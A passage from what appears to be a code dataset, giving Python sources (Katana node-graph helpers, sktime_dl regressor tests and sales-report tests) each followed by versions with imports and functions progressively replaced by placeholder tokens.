"from Katana import NodegraphAPI\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n new_pos_x = pos_x - x_spacing * (node.getNumInputPorts() - 1) / 2\n new_pos_y = pos_y + y_spacing\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y)\n )\n change_node_layout(input_node, x_spacing, y_spacing)\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\ndef get_reference_node(node, key):\n \"\"\"\n \"\"\"\n parameter = node.getParameter('node_' + key)\n if not parameter:\n return None\n return NodegraphAPI.GetNode(parameter.getValue(0))\n",
"<import token>\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n new_pos_x = pos_x - x_spacing * (node.getNumInputPorts() - 1) / 2\n new_pos_y = pos_y + y_spacing\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y)\n )\n change_node_layout(input_node, x_spacing, y_spacing)\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\ndef get_reference_node(node, key):\n \"\"\"\n \"\"\"\n parameter = node.getParameter('node_' + key)\n if not parameter:\n return None\n return NodegraphAPI.GetNode(parameter.getValue(0))\n",
"<import token>\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n new_pos_x = pos_x - x_spacing * (node.getNumInputPorts() - 1) / 2\n new_pos_y = pos_y + y_spacing\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y)\n )\n change_node_layout(input_node, x_spacing, y_spacing)\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\n<function token>\n",
"<import token>\n<function token>\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,814 | 5b39b1e694e01e86d13706909b0648ab07cfd683 | import numpy as np
import pytest
from sklearn.metrics import mean_squared_error
from sktime.datasets import load_airline
from sktime.datasets import load_italy_power_demand
from sktime.forecasting.compose import RecursiveTimeSeriesRegressionForecaster
from sktime.forecasting.model_selection import temporal_train_test_split
from sktime_dl.regression import MLPRegressor, MCDCNNRegressor, CNTCRegressor,\
LSTMFCNRegressor
from sktime_dl.utils.model_lists import (SMALL_NB_EPOCHS,
construct_all_regressors)
def test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):
"""
test a regressor
"""
print("Start test_regressor()")
X_train, y_train = load_italy_power_demand(split="train", return_X_y=True)
X_test, y_test = load_italy_power_demand(split="test", return_X_y=True)
# Create some regression values
y_train = np.zeros(len(y_train))
for i in range(len(X_train)):
y_train[i] = X_train.iloc[i].iloc[0].iloc[0]
y_test = np.zeros(len(y_test))
for i in range(len(X_test)):
y_test[i] = X_test.iloc[i].iloc[0].iloc[0]
estimator.fit(X_train[:10], y_train[:10])
estimator.predict(X_test[:10])
score = estimator.score(X_test[:10], y_test[:10])
print("Estimator score:", score)
print("End test_regressor()")
def test_regressor_forecasting(
regressor=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS), window_length=4
):
"""
test a regressor used for forecasting
"""
print("Start test_regressor_forecasting()")
if isinstance(regressor, MCDCNNRegressor):
regressor.nb_epochs = regressor.nb_epochs * 2
# load univariate time series data
y = load_airline()
y_train, y_test = temporal_train_test_split(y, test_size=5)
y_train = y_train[:window_length * 2]
# specify forecasting horizon
fh = np.arange(len(y_test)) + 1
# solve forecasting task via reduction to time series regression
forecaster = RecursiveTimeSeriesRegressionForecaster(
estimator=regressor, window_length=window_length
)
forecaster.fit(y_train)
y_pred = forecaster.predict(fh)
try:
mse = np.sqrt(mean_squared_error(y_test, y_pred))
print("Error:", mse)
except ValueError:
if isinstance(regressor, MCDCNNRegressor):
print(
"Warning: MCDCNNRegressor produced NaN predictions. This is a "
"known problem brought about by insufficient data/learning. "
"For now, we accept that this particular network produced "
"predictions at all (even NaNs) as passing for this "
"particular test. Providing more data/epochs risks slowing "
"down tests too much.")
else:
# unexpected error in all other cases
raise
print("End test_regressor_forecasting()")
def test_all_regressors():
for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():
print("\n\t\t" + name + " testing started")
test_regressor(network)
print("\t\t" + name + " testing finished")
@pytest.mark.parametrize(
"name, network",
construct_all_regressors(SMALL_NB_EPOCHS).items()
)
def test_all_forecasters(name, network):
window_length = 8
print("\n\t\t" + name + " forecasttesting \
started")
test_regressor_forecasting(network, window_length=window_length)
print("\t\t" + name + " forecasttesting \
finished")
| [
"import numpy as np\nimport pytest\nfrom sklearn.metrics import mean_squared_error\nfrom sktime.datasets import load_airline\nfrom sktime.datasets import load_italy_power_demand\nfrom sktime.forecasting.compose import RecursiveTimeSeriesRegressionForecaster\nfrom sktime.forecasting.model_selection import temporal_train_test_split\n\nfrom sktime_dl.regression import MLPRegressor, MCDCNNRegressor, CNTCRegressor,\\\n LSTMFCNRegressor\n\nfrom sktime_dl.utils.model_lists import (SMALL_NB_EPOCHS,\n construct_all_regressors)\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print(\"Start test_regressor()\")\n X_train, y_train = load_italy_power_demand(split=\"train\", return_X_y=True)\n X_test, y_test = load_italy_power_demand(split=\"test\", return_X_y=True)\n\n # Create some regression values\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n\n print(\"Estimator score:\", score)\n print(\"End test_regressor()\")\n\n\ndef test_regressor_forecasting(\n regressor=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS), window_length=4\n):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print(\"Start test_regressor_forecasting()\")\n\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n\n # load univariate time series data\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n\n # specify forecasting horizon\n fh = np.arange(len(y_test)) + 1\n\n # solve forecasting task via reduction to time series regression\n forecaster = RecursiveTimeSeriesRegressionForecaster(\n estimator=regressor, window_length=window_length\n )\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print(\"Error:\", mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n \"Warning: MCDCNNRegressor produced NaN predictions. This is a \"\n \"known problem brought about by insufficient data/learning. \"\n \"For now, we accept that this particular network produced \"\n \"predictions at all (even NaNs) as passing for this \"\n \"particular test. Providing more data/epochs risks slowing \"\n \"down tests too much.\")\n else:\n # unexpected error in all other cases\n raise\n\n print(\"End test_regressor_forecasting()\")\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print(\"\\n\\t\\t\" + name + \" testing started\")\n test_regressor(network)\n print(\"\\t\\t\" + name + \" testing finished\")\n\n\[email protected](\n \"name, network\",\n construct_all_regressors(SMALL_NB_EPOCHS).items()\n)\ndef test_all_forecasters(name, network):\n window_length = 8\n print(\"\\n\\t\\t\" + name + \" forecasttesting \\\n started\")\n test_regressor_forecasting(network, window_length=window_length)\n print(\"\\t\\t\" + name + \" forecasttesting \\\n finished\")\n",
"import numpy as np\nimport pytest\nfrom sklearn.metrics import mean_squared_error\nfrom sktime.datasets import load_airline\nfrom sktime.datasets import load_italy_power_demand\nfrom sktime.forecasting.compose import RecursiveTimeSeriesRegressionForecaster\nfrom sktime.forecasting.model_selection import temporal_train_test_split\nfrom sktime_dl.regression import MLPRegressor, MCDCNNRegressor, CNTCRegressor, LSTMFCNRegressor\nfrom sktime_dl.utils.model_lists import SMALL_NB_EPOCHS, construct_all_regressors\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print('\\n\\t\\t' + name + ' testing started')\n test_regressor(network)\n print('\\t\\t' + name + ' testing finished')\n\n\[email protected]('name, network', construct_all_regressors(\n SMALL_NB_EPOCHS).items())\ndef test_all_forecasters(name, network):\n window_length = 8\n print('\\n\\t\\t' + name + ' forecasttesting started')\n test_regressor_forecasting(network, window_length=window_length)\n print('\\t\\t' + name + ' forecasttesting finished')\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print('\\n\\t\\t' + name + ' testing started')\n test_regressor(network)\n print('\\t\\t' + name + ' testing finished')\n\n\[email protected]('name, network', construct_all_regressors(\n SMALL_NB_EPOCHS).items())\ndef test_all_forecasters(name, network):\n window_length = 8\n print('\\n\\t\\t' + name + ' forecasttesting started')\n test_regressor_forecasting(network, window_length=window_length)\n print('\\t\\t' + name + ' forecasttesting finished')\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\ndef test_all_regressors():\n for name, network in construct_all_regressors(SMALL_NB_EPOCHS).items():\n print('\\n\\t\\t' + name + ' testing started')\n test_regressor(network)\n print('\\t\\t' + name + ' testing finished')\n\n\n<function token>\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\ndef test_regressor_forecasting(regressor=CNTCRegressor(nb_epochs=\n SMALL_NB_EPOCHS), window_length=4):\n \"\"\"\n test a regressor used for forecasting\n \"\"\"\n print('Start test_regressor_forecasting()')\n if isinstance(regressor, MCDCNNRegressor):\n regressor.nb_epochs = regressor.nb_epochs * 2\n y = load_airline()\n y_train, y_test = temporal_train_test_split(y, test_size=5)\n y_train = y_train[:window_length * 2]\n fh = np.arange(len(y_test)) + 1\n forecaster = RecursiveTimeSeriesRegressionForecaster(estimator=\n regressor, window_length=window_length)\n forecaster.fit(y_train)\n y_pred = forecaster.predict(fh)\n try:\n mse = np.sqrt(mean_squared_error(y_test, y_pred))\n print('Error:', mse)\n except ValueError:\n if isinstance(regressor, MCDCNNRegressor):\n print(\n 'Warning: MCDCNNRegressor produced NaN predictions. This is a known problem brought about by insufficient data/learning. For now, we accept that this particular network produced predictions at all (even NaNs) as passing for this particular test. Providing more data/epochs risks slowing down tests too much.'\n )\n else:\n raise\n print('End test_regressor_forecasting()')\n\n\n<function token>\n<function token>\n",
"<import token>\n\n\ndef test_regressor(estimator=CNTCRegressor(nb_epochs=SMALL_NB_EPOCHS)):\n \"\"\"\n test a regressor\n \"\"\"\n print('Start test_regressor()')\n X_train, y_train = load_italy_power_demand(split='train', return_X_y=True)\n X_test, y_test = load_italy_power_demand(split='test', return_X_y=True)\n y_train = np.zeros(len(y_train))\n for i in range(len(X_train)):\n y_train[i] = X_train.iloc[i].iloc[0].iloc[0]\n y_test = np.zeros(len(y_test))\n for i in range(len(X_test)):\n y_test[i] = X_test.iloc[i].iloc[0].iloc[0]\n estimator.fit(X_train[:10], y_train[:10])\n estimator.predict(X_test[:10])\n score = estimator.score(X_test[:10], y_test[:10])\n print('Estimator score:', score)\n print('End test_regressor()')\n\n\n<function token>\n<function token>\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,815 | a0e02a125b674b3af1d532e1c32eb7f928b80fd2 | from pathlib import Path
import pytest
import sys
SRC_DIR = Path(__file__).parent.parent / 'src'
sys.path.append(str(SRC_DIR))
from sales_report import *
records = [
Record('0001', '001', '12'),
Record('0012', '001', '1000'),
Record('0012', '001', '32'),
Record('0009', '007', '207'),
Record('0112', '007', '12119'),
Record('1009', '007', '200'),
]
class TestSalesReport:
def test_process_product(self):
prod = process_product('0001', iter(records[:1]))
assert next(prod) == ' Product: 0001 Value: 12'
with pytest.raises(StopIteration) as e_info:
next(prod)
assert e_info.value.value == 12
prod = process_product('0012', records[1:3])
assert next(prod) == ' Product: 0012 Value: 1032'
with pytest.raises(StopIteration) as e_info:
next(prod)
assert e_info.value.value == 1032
def test_process_product_group(self):
prod_group = process_product_group('001', iter(records[:3]))
assert next(prod_group) == 'Group: 001'
assert next(prod_group) == ' Product: 0001 Value: 12'
assert next(prod_group) == ' Product: 0012 Value: 1032'
assert next(prod_group) == ' Group total: 1044'
assert next(prod_group) == ''
with pytest.raises(StopIteration) as e_info:
next(prod_group)
assert e_info.value.value == 1044
prod_group = process_product_group('007', iter(records[3:]))
assert next(prod_group) == 'Group: 007'
assert next(prod_group) == ' Product: 0009 Value: 207'
assert next(prod_group) == ' Product: 0112 Value: 12119'
assert next(prod_group) == ' Product: 1009 Value: 200'
assert next(prod_group) == ' Group total: 12526'
assert next(prod_group) == ''
with pytest.raises(StopIteration) as e_info:
next(prod_group)
assert e_info.value.value == 12526
def test_generate_report(self):
report_lines = process_all(records)
assert '\n'.join(report_lines) == """\
Group: 001
Product: 0001 Value: 12
Product: 0012 Value: 1032
  Group total: 1044

Group: 007
Product: 0009 Value: 207
Product: 0112 Value: 12119
Product: 1009 Value: 200
  Group total: 12526

Total: 13570"""
| [
"from pathlib import Path\n\nimport pytest\nimport sys\n\nSRC_DIR = Path(__file__).parent.parent / 'src'\nsys.path.append(str(SRC_DIR))\n\nfrom sales_report import *\n\nrecords = [\n Record('0001', '001', '12'),\n Record('0012', '001', '1000'),\n Record('0012', '001', '32'),\n Record('0009', '007', '207'),\n Record('0112', '007', '12119'),\n Record('1009', '007', '200'),\n]\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"\\\nGroup: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"from pathlib import Path\nimport pytest\nimport sys\nSRC_DIR = Path(__file__).parent.parent / 'src'\nsys.path.append(str(SRC_DIR))\nfrom sales_report import *\nrecords = [Record('0001', '001', '12'), Record('0012', '001', '1000'),\n Record('0012', '001', '32'), Record('0009', '007', '207'), Record(\n '0112', '007', '12119'), Record('1009', '007', '200')]\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\nSRC_DIR = Path(__file__).parent.parent / 'src'\nsys.path.append(str(SRC_DIR))\n<import token>\nrecords = [Record('0001', '001', '12'), Record('0012', '001', '1000'),\n Record('0012', '001', '32'), Record('0009', '007', '207'), Record(\n '0112', '007', '12119'), Record('1009', '007', '200')]\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\nsys.path.append(str(SRC_DIR))\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n\n def test_process_product(self):\n prod = process_product('0001', iter(records[:1]))\n assert next(prod) == ' Product: 0001 Value: 12'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 12\n prod = process_product('0012', records[1:3])\n assert next(prod) == ' Product: 0012 Value: 1032'\n with pytest.raises(StopIteration) as e_info:\n next(prod)\n assert e_info.value.value == 1032\n\n def test_process_product_group(self):\n prod_group = process_product_group('001', iter(records[:3]))\n assert next(prod_group) == 'Group: 001'\n assert next(prod_group) == ' Product: 0001 Value: 12'\n assert next(prod_group) == ' Product: 0012 Value: 1032'\n assert next(prod_group) == ' Group total: 1044'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 1044\n prod_group = process_product_group('007', iter(records[3:]))\n assert next(prod_group) == 'Group: 007'\n assert next(prod_group) == ' Product: 0009 Value: 207'\n assert next(prod_group) == ' Product: 0112 Value: 12119'\n assert next(prod_group) == ' Product: 1009 Value: 200'\n assert next(prod_group) == ' Group total: 12526'\n assert next(prod_group) == ''\n with pytest.raises(StopIteration) as e_info:\n next(prod_group)\n assert e_info.value.value == 12526\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 